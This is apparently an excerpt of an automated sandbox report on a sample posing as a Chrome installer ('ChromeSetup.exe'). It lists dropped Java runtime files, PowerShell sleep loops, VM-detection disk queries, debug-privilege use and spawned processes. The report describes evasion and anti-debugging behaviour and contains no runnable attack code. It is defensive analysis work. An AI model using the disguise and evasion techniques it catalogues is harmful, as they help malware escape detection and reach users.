Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5946			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3763			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\client\jvm.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\verify.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jdwp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_common.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_socket.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\instrument.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\resource.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2native.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\splashscreen.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fxplugins.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\eula.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\nio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\lcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\UAC.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fontmanager.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\deploy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\hprof.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jawt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsound.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_sw.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\decora_sse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\net.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glib-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jli.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glass.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\bci.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\npt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\Intel_Processor_Identification_Utility-Legacy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsdt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\awt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font_t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsoundds.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\NAct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\management.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\mlib_image.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\wsdetect.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dcpr.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 516	Thread sleep count: 5946 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176	Thread sleep count: 3763 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5304	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1976	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\deploy	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\	Jump to behavior

Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: l{constant pool}code cache C-heap hand metaspace chunks dict zone strs syms heap threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be klassguarantee(is_constantPool()) failedvtable restored by this call<pseudo-string> cache=0x%08x (extra) for /operands[%d]/preresolutionconstant pool [%d]A constant pool lockC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\constantPool.cppguarantee(!ConstantPool::is_invokedynamic_index(which)) failedan invokedynamic instruction does not have a klassRESOLVE %s %s
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp, classlist.0.dr	Binary or memory string: java/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Unable to link/verify VirtualMachineError class
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t[Ljava/lang/VirtualMachineError;
Source: svchost.exe, 00000007.00000002.2860824933.000001C7D6C54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2860164381.000001C7D162B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )Q+com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
Source: javaw.exe, 00000002.00000003.1025298094.0000000014E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3383842024.0000000002750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lVirtualMachineError.java
Source: javaw.exe, 00000002.00000002.3382950654.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\ChromeSetup.exe

Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Code function: 1_2_00401150 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,

1_2_00401150

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

